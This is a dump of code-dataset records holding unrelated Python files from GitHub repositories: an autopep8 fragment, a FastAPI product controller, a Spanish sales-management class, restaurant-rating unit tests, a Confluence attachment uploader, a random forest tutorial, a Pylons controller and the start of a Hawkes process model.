None\n\n\ndef check_syntax(code):\n \"\"\"Return True if syntax is okay.\"\"\"\n try:\n return compile(code, '', 'exec')\n except (SyntaxError, TypeError, UnicodeDecodeError):\n return False\n\n\ndef fix_file(filename, opts, output=sys.stdout):\n tmp_source = read_from_filename(filename)\n\n # Add missing newline (important for diff)\n tmp_newline = find_newline(tmp_source)\n if tmp_source == tmp_source.rstrip(tmp_newline):\n tmp_source += tmp_newline\n\n fix = FixPEP8(filename, opts, contents=tmp_source)\n fixed_source = fix.fix()\n original_source = copy.copy(fix.original_source)\n tmp_filename = filename\n if not pep8 or opts.in_place:\n encoding = detect_encoding(filename)\n for _ in range(opts.pep8_passes):\n if fixed_source == tmp_source:\n break\n tmp_source = copy.copy(fixed_source)\n if not pep8:\n tmp_filename = tempfile.mkstemp()[1]\n fp = open_with_encoding(tmp_filename, encoding=encoding, mode='w')\n fp.write(fixed_source)\n fp.close()\n fix = FixPEP8(tmp_filename, opts, contents=tmp_source)\n fixed_source = fix.fix()\n if not pep8:\n os.remove(tmp_filename)\n del tmp_filename\n del tmp_source\n\n if opts.diff:\n new = StringIO(''.join(fix.source))\n new = new.readlines()\n output.write(_get_difftext(original_source, new, filename))\n elif opts.in_place:\n fp = open_with_encoding(filename, encoding=encoding,\n mode='w')\n fp.write(fixed_source)\n fp.close()\n else:\n output.write(fixed_source)\n\n\ndef parse_args(args):\n \"\"\"Parse command-line options.\"\"\"\n parser = OptionParser(usage='Usage: autopep8 [options] '\n '[filename [filename ...]]',\n version=\"autopep8: %s\" % __version__,\n description=__doc__,\n prog='autopep8')\n parser.add_option('-v', '--verbose', action='store_true', dest='verbose',\n help='print verbose messages')\n parser.add_option('-d', '--diff', action='store_true', dest='diff',\n help='print the diff for the fixed source')\n parser.add_option('-i', '--in-place', action='store_true',\n help='make changes to files in place')\n parser.add_option('-r', '--recursive', action='store_true',\n help='run recursively; must be used with --in-place or '\n '--diff')\n parser.add_option('-p', '--pep8-passes',\n default=PEP8_PASSES_MAX, type='int',\n help='maximum number of additional pep8 passes'\n ' (default: %default)')\n parser.add_option('--ignore', default='',\n help='do not fix these errors/warnings (e.g. E4,W)')\n parser.add_option('--select', default='',\n help='select errors/warnings (e.g. E4,W)')\n opts, args = parser.parse_args(args)\n\n if not len(args):\n parser.error('incorrect number of arguments')\n\n if len(args) > 1 and not (opts.in_place or opts.diff):\n parser.error('autopep8 only takes one filename as argument '\n 'unless the \"--in-place\" or \"--diff\" options are '\n 'used')\n\n if opts.recursive and not (opts.in_place or opts.diff):\n parser.error('--recursive must be used with --in-place or --diff')\n\n if opts.in_place and opts.diff:\n parser.error('--in-place and --diff are mutually exclusive')\n\n return opts, args\n\n\ndef main():\n \"\"\"Tool main.\"\"\"\n opts, args = parse_args(sys.argv[1:])\n if opts.in_place or opts.diff:\n filenames = list(set(args))\n else:\n assert len(args) == 1\n assert not opts.recursive\n filenames = args[:1]\n\n while filenames:\n name = filenames.pop(0)\n if opts.recursive and os.path.isdir(name):\n for root, directories, children in os.walk(name):\n filenames += [os.path.join(root, f) for f in children\n if f.endswith('.py') and\n not f.startswith('.')]\n for d in directories:\n if d.startswith('.'):\n directories.remove(d)\n else:\n if opts.verbose:\n sys.stderr.write('[file:%s]\\n' % name)\n try:\n fix_file(name, opts)\n except (UnicodeDecodeError, UnicodeEncodeError, IOError) as error:\n sys.stderr.write(str(error) + '\\n')\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"funningboy/vim","sub_path":"pylibs/autopep8.py","file_name":"autopep8.py","file_ext":"py","file_size_in_byte":55134,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"75"} +{"seq_id":"21366558893","text":"from fastapi.params import Header\n\nfrom pim_vi.controller import Controller\nfrom pim_vi.model import Product\nfrom pim_vi.model.product_model import ProductModel\n\n\nclass ProductController(Controller):\n def __init__(self, app):\n super().__init__()\n app.post(\"/product\")(self.create_product)\n app.get(\"/product/{product_id}\")(self.get_product)\n app.get(\"/product\")(self.get_products)\n app.delete(\"/product/{product_id}\")(self.delete_product)\n app.put(\"/product/{product_id}\")(self.update_product)\n\n async def create_product(self, product: Product, authorization: str = Header(None)):\n try:\n user_id = super().get_id_from_token(authorization)\n async with ProductModel() as m:\n product = await m.create_product(product)\n if not product:\n return {\"message\": \"Product not created\"}\n return product\n except Exception as e:\n print(e)\n return {\"message\": \"Erro ao criar produto\", \"error\": e}\n\n async def get_products(self):\n try:\n async with ProductModel() as m:\n products = await m.get_all_products()\n if not products:\n return {\"message\": \"Products not found\"}\n return products\n except Exception as e:\n print(e)\n return {\"message\": \"Erro ao buscar produtos\", \"error\": e}\n\n async def get_product(self, product_id: str, authorization: str = Header(None)):\n try:\n user_id = super().get_id_from_token(authorization)\n async with ProductModel() as m:\n product = await m.get_product(product_id)\n if not product:\n return {\"message\": \"Product not found\"}\n return product\n except Exception as e:\n print(e)\n return {\"message\": \"Erro ao buscar produto\", \"error\": e}\n\n async def delete_product(self, product_id: str, authorization: str = Header(None)):\n try:\n user_id = super().get_id_from_token(authorization)\n async with ProductModel() as m:\n product = await m.delete_product(product_id)\n if not product:\n return {\"message\": \"Product not found\"}\n return product\n except Exception as e:\n print(e)\n return {\"message\": \"Erro ao buscar produto\", \"error\": e}\n\n async def update_product(self, product_id: str, product: Product, authorization: str = Header(None)):\n try:\n user_id = super().get_id_from_token(authorization)\n async with ProductModel() as m:\n product = await m.update_product_by_id(product_id, product)\n if not product:\n return {\"message\": \"Product not found\"}\n return product\n except Exception as e:\n print(e)\n return {\"message\": \"Erro ao buscar produto\", \"error\": e}\n","repo_name":"EdSL88/PimVIBack","sub_path":"pim_vi/controller/product_controller.py","file_name":"product_controller.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72119589681","text":"from GestiondeClientes import GestiondeClientes\r\nfrom GestiondeProductos import GestiondeProductos\r\nfrom GestiondePagos import GestiondePagos\r\nfrom GestiondeEnvios import GestiodeEnvios\r\n\r\n\r\nclass GestiondeVentas:\r\n #Primero creamos el constructor para establecer los atributos necesarios\r\n\r\n def __init__ (self,cliente,productos,cantidad,pago,envio,subtotal,descuentos,iva,igtf,total,fecha):\r\n self.cliente=cliente\r\n self.productos=productos\r\n self.cantidad=cantidad\r\n self.pago=pago\r\n self.envio=envio\r\n self.subtotal=subtotal\r\n self.descuentos=descuentos\r\n self.iva=iva\r\n self.igtf=igtf\r\n self.total=total\r\n self.fecha=fecha\r\n self.CompraProductos=[]\r\n self.ventas=[]\r\n self.gestiondeClientes=GestiondeClientes\r\n\r\n \r\n #Una serie de metodos para simplificar los calculos y no crear un solo metodo largo\r\n def calcular_descuento(self):\r\n if GestiondeClientes.tipo == \"Juridico\":\r\n self.descuentos=self.subtotal * 0.05\r\n else:\r\n self.descuentos= 0\r\n \r\n def calcular_iva(self):\r\n self.calcular_subtotal\r\n self.iva= self.subtotal * 0.16\r\n \r\n def calcular_igtf(self):\r\n if GestiondePagos.tipodepago == \"Efectivo\" or self.pago==\"Tarjeta internacional\" or self.pago==\"Zelle\":\r\n self.igtf= self.subtotal * 0.03\r\n else:\r\n self.igtf= 0\r\n\r\n\r\n def calcular_subtotal(self): \r\n self.subtotal= sum(i[1] * i[2] for i in self.CompraProductos)\r\n\r\n\r\n def calcular_Total(self):\r\n self.calcular_descuento() \r\n self.calcular_iva()\r\n self.calcular_igtf() \r\n self.total = self.subtotal - self.descuentos + self.iva + self.igtf\r\n\r\n #Metodo de validacion para simplificar donde sea necesario\r\n\r\n def validacionCI(self,CI):\r\n while not CI.isdigit():\r\n print(\"Introduzca una cedula valida\")\r\n CI=input(\"CI: \")\r\n \r\n #En este metodo primero llamamos a otras clases para poder acceder a atributos de ellas\r\n #Elaboro unos condicionales para poder buscar y utilizar los objetos deseados y mensajes de error\r\n #por si no se encuentra registrado\r\n\r\n\r\n def RegistrarVenta(self, clienteB, prodB):\r\n clienteB=GestiondeClientes()\r\n prodB=GestiondeProductos()\r\n print(\"Desea buscar el cliente mediante cedula o email?\")\r\n decisionCI=input(\"CI (1) correo(2)\")\r\n while decisionCI not in (\"1\" ,\"2\"):\r\n print(\"Introduzca una opcion valida\")\r\n print(\"Desea buscar el cliente mediante cedula o email?\")\r\n decisionCI=input(\"CI (1) correo(2)\")\r\n if decisionCI==\"1\":\r\n cedulacliente=input(\"CI del cliente: \\n\")\r\n self.validacionCI(cedulacliente)\r\n cliente=clienteB.buscar_CI(cedulacliente)\r\n\r\n elif decisionCI==\"2\":\r\n correocliente=input(\"Correo del cliente:\\n\")\r\n cliente=clienteB.buscar_correo(correocliente)\r\n if cliente is None:\r\n print(\"El cliente no se encuentra registrado.\")\r\n return\r\n\r\n #Se dan a conocer los atributos del cliente que se establecieron para evitar confusiones\r\n\r\n print(f\"La compra es a nombre de {cliente.nombre} {cliente.apellido}\")\r\n \r\n #Ahora ocurre lo mismo pero con los productos con ligeros cambios, ya que se debe decidir la cantidad\r\n #a comprar de cada uno \r\n\r\n print(\"Desea agregar un producto?\")\r\n AgregarProductos=input(\"Si (1) No(2)\")\r\n while AgregarProductos ==\"1\":\r\n print(\"Que producto va a comprar\")\r\n producto=input(\"Nombre del producto:\")\r\n prod=prodB.buscar_name(producto)\r\n if prod is None:\r\n print(\"No disponemos del producto\")\r\n return\r\n else:\r\n cantidad=int(input(\"Cantidad a comprar:\"))\r\n precio=prod.precio\r\n self.CompraProductos.append([prod, cantidad, precio])\r\n AgregarProductos=input(\"Si (1) No(2)\")\r\n\r\n #Se accede al modulo GestiondePagos para que sea una compra consistente, es decir, que no sea cada uno\r\n #independiente sino que se relacionen dando un mejor funcionamiento, estableciendo mismos valores \r\n #y simplificando el codigo\r\n\r\n\r\n self.pago=GestiondePagos(self.cliente)\r\n \r\n self.pago.RegistrarPago()\r\n self.pago.RegistrarFechaActual()\r\n self.fecha = self.pago.fecha\r\n\r\n #Lo mismo con el modulo GestiondeEnvios\r\n self.envio=GestiodeEnvios()\r\n self.envio.RegistrarEnvio() \r\n\r\n\r\n #Se ejecutan los calculos utilizando los valores de gestiondePago conjunto a los de los productos\r\n \r\n self.calcular_Total()\r\n self.total+=self.envio.costoenvio\r\n\r\n #Se determina el costo, se muestra el total con y sin descuento, en caso de no tener sera el mismo\r\n\r\n print(f\"Subtotal antes de descuentos: {self.subtotal}\")\r\n print(f\"El total de la compra sería: {self.total}\")\r\n\r\n #Y para finalizar se pregunta si realmente se quiere comprar, ya que pueden ocurrir confusiones con los precios\r\n #anadiendo a dos listas distintas, la de pagos y la de ventas. Imprimiendo los datos generales y la factura\r\n #En caso de no confirmar simplmente el proceso llega hasta ahi sin anadir objetos y entregando un mensaje de cancelacion\r\n\r\n print(\"Confirma la venta?\")\r\n confirmar = input(\"Si (1) No(2): \")\r\n while confirmar not in (\"1\", \"2\"):\r\n confirmar = input(\"Introduzca '1' para confirmar o '2' para cancelar: \")\r\n \r\n if confirmar == \"1\": \r\n print(\"Compra realizada con exito\")\r\n self.listPagos.append({\r\n \"cliente\": self.cliente,\r\n \"productos\": self.CompraProductos, \r\n \"total\": self.total\r\n })\r\n print(\"Su factura\")\r\n self.Factura()\r\n\r\n self.listVentas.append(self) \r\n\r\n else: \r\n print(\"Venta cancelada.\")\r\n \r\n \r\n\r\n #Metodo para mostrar los atributos\r\n\r\n def Factura(self):\r\n print(f'''\r\n cliente: {self.cliente.nombre}\r\n productos: {self.CompraProductosproductos}\r\n cantidad: {self.cantidad}\r\n total: {self.total}\r\n direccion: {self.gestiondeClientes.direccion}\r\n fecha: {self.fecha} \r\n ''')\r\n\r\n #Metodos de busqueda como los de GestiondeProductos (revisar esos docstrings para explicacion)\r\n\r\n def SearchClientesVentas(self):\r\n buscar= False\r\n nombre=input(\"Nombre del producto: \\n\")\r\n for x in self.listClientes:\r\n if x.nombre==nombre:\r\n buscar=True\r\n print(\"Se encuentra en la lista\")\r\n x.Factura()\r\n if not buscar:\r\n print(\"El cliente no está registrado\")\r\n\r\n def SearchFechaVentas(self):\r\n buscar = False\r\n fecha_buscar = input(\"Introduzca la fecha a buscar (mm/dd/aaaa, hh:mm:ss): \") \r\n for venta in self.ventas:\r\n if venta.fecha == fecha_buscar:\r\n buscar = True\r\n print(\"Se ha encontrado una coincidencia\")\r\n venta.Factura() \r\n if not buscar:\r\n print(\"No se han encontrado coincidencias\")\r\n\r\n def SearchMontoVentas(self):\r\n buscar=False\r\n MontoABuscar=input(\"Introduzca el monto a buscar: \")\r\n for i in self.listPagos:\r\n if i.total==MontoABuscar:\r\n buscar=True\r\n print(\"Existen coincidencias\")\r\n i.Factura()\r\n if not buscar:\r\n print(\"No hay compras con ese monto\")\r\n","repo_name":"Msuso23/Proyecto","sub_path":"GestiondeVentas.py","file_name":"GestiondeVentas.py","file_ext":"py","file_size_in_byte":7785,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"24493788872","text":"\ndef __set__(setting):\n local_settings = 'travtogether_server.settings.local'\n production_settings = 'backend.settings.production'\n local_host = \"127.0.0.1\"\n production_host = \"travtogether-server.herokuapp.com\"\n if setting == \"local\":\n return local_settings, local_host\n elif setting == \"production\":\n return production_settings, production_host\n\n\nCURRENT_SETTING, CURRENT_HOST = __set__(\"local\")","repo_name":"yousebastian1618/TravTogether_Server","sub_path":"travtogether_server/current_settings.py","file_name":"current_settings.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17364621831","text":"from unittest import TestCase, mock\nimport restaurantcli as rcli\nimport restaurantratings as rr\n\n\nclass CLITestCase(TestCase):\n \"\"\"Tests for our Restaurant CLI\"\"\"\n\n def setUp(self):\n self.ratings = rr.RestaurantRatings([\n rr.RestaurantRating(\"The Tavern\", 10),\n rr.RestaurantRating(\"Gastropub\", 7)\n ])\n\n def test_get_ratings(self):\n # Create mock method that returns ratings attr\n\n def mock_get_ratings_from_file(filename):\n return self.ratings\n\n with mock.patch(\n \"restaurantratings.RestaurantRatings.get_ratings_from_file\",\n mock_get_ratings_from_file) as m:\n\n ratings = rr.RestaurantRatings.get_ratings_from_file(\"mockfile\")\n\n self.assertEqual(len(ratings.ratings), 2)\n self.assertEqual(ratings.ratings[0].name, \"The Tavern\")\n self.assertEqual(ratings.ratings[0].rating, 10)\n self.assertEqual(ratings.ratings[1].name, \"Gastropub\")\n self.assertEqual(ratings.ratings[1].rating, 7)\n\n\nclass RestaurantRatingTests(TestCase):\n \"\"\"Tests for individual restaurant rating objects\"\"\"\n\n def test_init(self):\n rating = rr.RestaurantRating(\"The Tavern\", 10)\n self.assertEqual(rating.name, \"The Tavern\")\n self.assertEqual(rating.rating, 10)\n\n def test_update_rating(self):\n rating = rr.RestaurantRating(\"The Tavern\", 10)\n rating.update_rating(2)\n self.assertEqual(rating.rating, 2)\n\n def test_eq_true(self):\n rating_1 = rr.RestaurantRating(\"The Tavern\", 10)\n rating_2 = rr.RestaurantRating(\"Gastropub\", 10)\n self.assertEqual(rating_1, rating_2)\n\n def test_eq_false(self):\n rating_1 = rr.RestaurantRating(\"The Tavern\", 10)\n rating_2 = rr.RestaurantRating(\"Gastropub\", 9)\n self.assertNotEqual(rating_1, rating_2)\n\n def test_lt_true(self):\n rating_1 = rr.RestaurantRating(\"The Tavern\", 9)\n rating_2 = rr.RestaurantRating(\"Gastropub\", 10)\n self.assertLess(rating_1, rating_2)\n\n def test_lt_false(self):\n rating_1 = rr.RestaurantRating(\"The Tavern\", 10)\n rating_2 = rr.RestaurantRating(\"Gastropub\", 9)\n self.assertFalse(rating_1 < rating_2)\n\n\nclass RestaurantRatingsTests(TestCase):\n \"\"\"Tests for the RestaurantRatingsTests umbrella objects\"\"\"\n\n def setUp(self):\n \"\"\"Set up sub-objects for RestaurantRatings tests\"\"\"\n self.rrobj = rr.RestaurantRatings([\n rr.RestaurantRating(\"The Tavern\", 10),\n rr.RestaurantRating(\"Gastropub\", 9),\n rr.RestaurantRating(\"Snack Shack\", 5)\n ])\n\n def test_init(self):\n rrobj = rr.RestaurantRatings()\n self.assertEqual(len(rrobj.ratings), 0)\n self.assertEqual(rrobj.ratings, [])\n\n def test_init_with_source(self):\n rrobj = rr.RestaurantRatings([rr.RestaurantRating(\"The Tavern\", 10)])\n self.assertEqual(len(rrobj.ratings), 1)\n self.assertEqual(rrobj.ratings[0].name, \"The Tavern\")\n self.assertEqual(rrobj.ratings[0].rating, 10)\n\n def test_add_rating(self):\n self.rrobj.add_rating(\"Kimberly's\", 5)\n self.assertEqual(len(self.rrobj.ratings), 4)\n self.assertEqual(self.rrobj.ratings[3].name, \"Kimberly's\")\n self.assertEqual(self.rrobj.ratings[3].rating, 5)\n\n def test_get_rating_by_name(self):\n restaurant_rating = self.rrobj.get_rating_by_name(\"The Tavern\")\n self.assertEqual(restaurant_rating.name, \"The Tavern\")\n self.assertEqual(restaurant_rating.rating, 10)\n\n def test_remove_rating_by_name(self):\n self.rrobj.remove_rating_by_name(\"The Tavern\")\n self.assertEqual(len(self.rrobj.ratings), 2)\n self.assertEqual(self.rrobj.ratings[0].name, \"Gastropub\")\n self.assertEqual(self.rrobj.ratings[1].name, \"Snack Shack\")\n\n def test_remove_rating_by_index(self):\n self.rrobj.remove_rating_by_index(1)\n self.assertEqual(len(self.rrobj.ratings), 2)\n self.assertEqual(self.rrobj.ratings[1].name, \"Snack Shack\")\n self.assertEqual(self.rrobj.ratings[1].rating, 5)\n\n def get_rating_by_name_error(self):\n with self.assertRaises(NoSuchRestaurantError):\n self.rrobj.get_rating_by_name(\"Not a Restaurant\")\n\n\nclass MockedFileRestaurantRatingsTests(TestCase):\n \"\"\"Mock our save to file test case\"\"\"\n\n def test_save_to_file(self):\n mockobj = mock.mock_open()\n rrobj = rr.RestaurantRatings([\n rr.RestaurantRating(\"The Tavern\", 10)\n ])\n\n with mock.patch(\"builtins.open\", mockobj) as mock_f:\n rrobj.save_to_file(\"mockfile\")\n\n mockobj.assert_called_once_with(\"mockfile\", \"w\")\n mockobj().write.assert_has_calls([\n mock.call(\"The Tavern\"),\n mock.call(\":\"),\n mock.call(\"10\"),\n ])\n\n\nif __name__ == \"__main__\":\n\n import unittest\n\n unittest.main()\n","repo_name":"nykimberly/playground-python","sub_path":"hb/w2/d6_weekend-review/restaurant-cli/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14781968895","text":"#Добавление вложений в confluence, а также обновление метаданных\n\n# -*- coding: utf-8 -*-\nfrom __future__ import with_statement\nimport sys, string, re, os\nimport pyodbc\nimport xmlrpc.client\nimport codecs\n\nURL ='' \nusername = '' #логин\npwd = '' #пароль\nclient = xmlrpc.client.ServerProxy(URL+'/rpc/xmlrpc') #API.XMLRPC\nauthToken = client.confluence2.login(username,pwd) #API.авторизация\n\nPAGE_PRN_ID = '885102819'\n\nsql_5_0 = \"SELECT FILE_PATH,PAGE_PRN_ID, FILE_EXT,FULL_NAME FROM DEV_DB_STG.S_FILE_POWER_DESIGNER where FILE_EXT in ('png','gif','css','js') order by FILE_NAME, FILE_EXT\"\nprint(sql_5_0)\nconnect = pyodbc.connect('DSN=TD')\ncursor = connect.cursor()\ncursor.execute(sql_5_0)\nconnect.commit()\ntable_5 = cursor.fetchall()\nfor row in table_5:\n print(row[0],row[2])\n if row[2] == 'gif':\n contentType = 'image/gif'\n elif row[2] == 'png':\n contentType = 'image/png'\n elif row[2] == 'css':\n contentType = 'text/css'\n elif row[2] == 'js':\n contentType = 'application/x-javascript'\n path = row[0]\n f = open(path,'rb')\n data = f.read()\n filename = row[3]\n page_id = row[1]\n page = client.confluence2.getPage(authToken, str(page_id))\n client.confluence2.removeAttachment(authToken, str(page_id),str(filename))\n print('file remove')\n if page is None:\n exit(\"Could not find page \" + spacekey + \":\" + str(page['title']))\n attachment = {}\n attachment['fileName'] =os.path.basename(filename)\n attachment['contentType'] = contentType\n print(page['id'])\n client.confluence2.addAttachment(authToken, page['id'], attachment, xmlrpc.client.Binary(data))\nf.close\ncursor.close\nconnect.close()\n#-----------------------------------------------------------------------------------------------------\npage_attachment = '885102819'\ntext = client.confluence2.getAttachments(authToken,page_attachment)\nconnect = pyodbc.connect('DSN=TD')\ncursor = connect.cursor()\nfor i in range(len(text)):\n sql_6_1 = \"UPDATE DEV_DB_STG.S_FILE_POWER_DESIGNER set URL ='\"+str(text[i]['url']) + u\"' where FULL_NAME = '\" + str(text[i]['fileName'])+u\"';\"\n cursor.execute(sql_6_1)\n connect.commit()\n i = i + 1\ncursor.close\nconnect.close()\n","repo_name":"Testudinate/Confluence","sub_path":"05_addAttachment_getAttachments.py","file_name":"05_addAttachment_getAttachments.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"17239598628","text":"# Combining weak to strong learners via random forests\n'''\nIntuitively, a random forest can be considered as an ensemble of decision\ntrees. The idea behind the ensemble learning is to combine weak learners\nto build a more robust model, a strong learner, that has a better generalization\nerror and is less susceptible to overfitting.\n\n'''\n# Train a model to classify the different flowers in our Iris dataset\nfrom sklearn import datasets\nimport numpy as np\n\niris = datasets.load_iris()\nX = iris.data[:, [2, 3]]\ny = iris.target\n\nfrom sklearn.cross_validation import train_test_split\n\n# random_state : int or RandomState\n# Pseudo-random number generator state used for random sampling.\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)\nX_combined = np.vstack((X_train, X_train))\ny_combined = np.hstack((y_train, y_test))\n\nfrom matplotlib.colors import ListedColormap\nimport matplotlib.pyplot as plt\n\n\ndef plot_decision_regions(X, y, classifier, test_idx=None, resolution=0.02):\n # setup marker generator and color map\n markers = ('s', 'x', 'o', '^', 'v')\n colors = ('red', 'blue', 'lightgreen', 'gray', 'cyan')\n cmap = ListedColormap(colors[:len(np.unique(y))])\n # plot the decision surface\n x1_min, x1_max = X[:, 0].min() - 1, X[:, 0].max() + 1\n x2_min, x2_max = X[:, 1].min() - 1, X[:, 1].max() + 1\n xx1, xx2 = np.meshgrid(np.arange(x1_min, x1_max, resolution),\n np.arange(x2_min, x2_max, resolution))\n Z = classifier.predict(np.array([xx1.ravel(), xx2.ravel()]).T)\n Z = Z.reshape(xx1.shape)\n plt.contourf(xx1, xx2, Z, alpha=0.4, cmap=cmap)\n plt.xlim(xx1.min(), xx1.max())\n plt.ylim(xx2.min(), xx2.max())\n # plot all samples\n X_test, y_test = X[test_idx, :], y[test_idx]\n for idx, cl in enumerate(np.unique(y)):\n plt.scatter(x=X[y == cl, 0], y=X[y == cl, 1], alpha=0.8, c=cmap(idx), marker=markers[idx], label=cl)\n\n # highlight test samples\n if test_idx:\n X_test, y_test = X[test_idx, :], y[test_idx]\n plt.scatter(X_test[:, 0], X_test[:, 1], c='', alpha=1.0, linewidth=1, marker='o', s=55, label='test set')\n\n\n'''\nWe do not have to construct the random forest classifier from individual decision trees\nby ourselves; there is already an implementation in scikit-learn that we can use:\n''' \nfrom sklearn.ensemble import RandomForestClassifier\nforest = RandomForestClassifier(criterion='entropy', n_estimators=10, random_state=1, n_jobs=2)\nforest.fit(X_train, y_train)\nplot_decision_regions(X_combined, y_combined, classifier=forest, test_idx=range(105, 150))\nplt.xlabel('petal length')\nplt.ylabel('petal width')\nplt.legend(loc='upper left')\nplt.show()\n\n'''\nUsing the preceding code, we trained a random forest from 10 decision trees via the\nn_estimators parameter and used the entropy criterion as an impurity measure to\nsplit the nodes. Although we are growing a very small random forest from a very\nsmall training dataset, we used the n_jobs parameter for demonstration purposes,\nwhich allows us to parallelize the model training using multiple cores of our\ncomputer (here, two).\n\n'''\n","repo_name":"wei-Z/Python-Machine-Learning","sub_path":"self_practice/Chapter 3 Random Forest.py","file_name":"Chapter 3 Random Forest.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"24760604673","text":"#1. В единственной строке записан текст. Для каждого слова из данного текста подсчитайте,\n# сколько раз оно встречалось в этом тексте. Задачу необходимо решить с использованием словаря.\n\ns = input('Enter the string: ')\ns = s.split()\nd = dict()\nfor k in s:\n if k in d:\n d[k] += 1\n else:\n d[k] = 1\nfor k in d:\n print(k,':', d[k])","repo_name":"podloznyi/Studying_Python","sub_path":"HomeWork7/ThirdTask.py","file_name":"ThirdTask.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"28018261845","text":"from datetime import datetime\nimport logging\n\nfrom paste.deploy.converters import asbool, asint\nfrom pylons import request, response, tmpl_context as c, config\nfrom pylons.controllers.util import redirect\nfrom pylons.decorators import validate\nfrom sqlalchemy import not_\n\nfrom adhocracy import model\nfrom adhocracy.controllers.event import EventController\nfrom adhocracy.lib import helpers as h\nfrom adhocracy.lib import pager, sorting\nfrom adhocracy.lib.auth import require\nfrom adhocracy.lib.base import BaseController\nfrom adhocracy.lib.staticpage import get_static_page\nfrom adhocracy.lib.templating import render\nfrom adhocracy.lib.util import get_entity_or_abort\n\nfrom proposal import ProposalFilterForm\n\n\nlog = logging.getLogger(__name__)\n\n\nclass RootController(BaseController):\n\n @validate(schema=ProposalFilterForm(), post_only=False, on_get=True)\n def index(self, format='html'):\n require.proposal.index()\n if c.instance:\n redirect(h.entity_url(c.instance))\n\n instances_in_root = asint(\n config.get('adhocracy.startpage.instances.list_length', 0))\n if instances_in_root > 0:\n c.instances = model.Instance.all(limit=instances_in_root)\n elif instances_in_root == -1:\n c.instances = model.Instance.all()\n\n c.page = get_static_page('index')\n\n proposals_number = asint(\n config.get('adhocracy.startpage.proposals.list_length', 0))\n\n if proposals_number > 0:\n proposals = model.Proposal.all_q()\\\n .join(model.Instance).filter(not_(\n model.Instance.key.in_(model.Instance.SPECIAL_KEYS)))\\\n .order_by(model.Proposal.create_time.desc())\n\n c.new_proposals_pager = pager.proposals(\n proposals, size=proposals_number,\n default_sort=sorting.entity_newest,\n enable_pages=False,\n enable_sorts=False)\n else:\n c.new_proposals_pager = None\n\n if asbool(config.get('adhocracy.show_stats_on_frontpage', 'true')):\n c.stats_global = {\n \"members\": model.User.all_q().count(),\n \"comments\": model.Comment.all_q().count(),\n \"proposals\": model.Proposal.all_q().count(),\n \"votes\": model.Vote.all_q().count(),\n }\n\n if format == 'rss':\n return EventController().all(format='rss')\n\n return render('index.html')\n\n #@RequireInstance\n def dispatch_delegateable(self, id):\n dgb = get_entity_or_abort(model.Delegateable, id,\n instance_filter=False)\n redirect(h.entity_url(dgb))\n\n def sitemap_xml(self):\n if c.instance:\n redirect(h.base_url('/sitemap.xml', None))\n c.delegateables = model.Delegateable.all()\n c.change_time = datetime.utcnow()\n response.content_type = \"text/xml\"\n return render(\"sitemap.xml\")\n\n def robots_txt(self):\n response.content_type = \"text/plain\"\n if not c.instance:\n return render(\"robots.txt\")\n return render(\"instance/robots.txt\")\n\n def tutorials(self):\n if 'disable' in request.params:\n name = request.params.get('disable')\n if name == 'ALL':\n h.tutorial.disable(None)\n else:\n h.tutorial.disable(name)\n else:\n h.tutorial.enable()\n","repo_name":"whausen/part","sub_path":"src/adhocracy/controllers/root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"25090492824","text":"from __future__ import print_function, division\nimport sys\nimport os\nimport bz2\nimport json\nimport cPickle as pickle\nimport numpy as np\nfrom scipy import optimize\nimport matplotlib.pyplot as plt\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n# Hawkes Intensity Process model in Python\n\n\ndef get_C(k, alpha=2.016, beta=0.1):\n \"\"\"\n Get parameter capital C.\n :param k: scaling factor for video quality\n :param alpha: power-law exponent of user influence distribution\n :param beta: user influence component\n :return: parameter capital C\n \"\"\"\n return k*(alpha-1)/(alpha-beta-1)\n\n\ndef rand_initialize_weights(n):\n \"\"\"\n Initialize multiple sets of random weights for theta.\n :param n: number of sets of random weights\n :return: n sets of random vectors, in the order of mu, theta, C, c, gamma, eta\n \"\"\"\n ret = []\n for _ in xrange(n):\n rand_mu = np.random.uniform(0, 505.90)\n rand_theta = np.random.uniform(2.3, 67.7)\n rand_C = get_C(np.random.uniform(0, 52.9))\n rand_c = np.random.uniform(0, 4)\n rand_gamma = np.random.uniform(0, 9947)\n rand_eta = np.random.uniform(0, 289.2)\n ret.append(np.array([rand_mu, rand_theta, rand_C, rand_c, rand_gamma, rand_eta]))\n return ret\n\n\ndef time_decay(i, c):\n \"\"\"\n Time decay part for series (tau + c).\n :param i: tau value\n :param c: c value\n :return: abbreviated presentation\n \"\"\"\n return np.arange(1, i+1)[::-1]+c\n\n\ndef predict(params, x):\n \"\"\"\n Predict viewcount with sharecount sequence x.\n Comments are for vector operation style\n :param params: model parameters, mu, theta, C, c, gamma, eta\n :param x: observed sharecount sequence from beginning\n :return: predict value\n \"\"\"\n mu, theta, C, c, gamma, eta = params\n n = len(x)\n x_predict = np.zeros(len(x))\n for i in xrange(n):\n if i == 0:\n x_predict[0] = gamma + mu*x[0]\n else:\n x_predict[i] = eta + mu*x[i] + C*np.sum(x_predict[:i]*(time_decay(i, c)**(-1-theta)))\n return x_predict\n\n\ndef cost_function(params, x, y, num_split=None):\n \"\"\"\n Non-regularized cost function for HIP model\n :param params: model parameters, mu, theta, C, c, gamma, eta\n :param x: observed sharecount\n :param y: observed viewcount\n :param num_split: number of test set\n 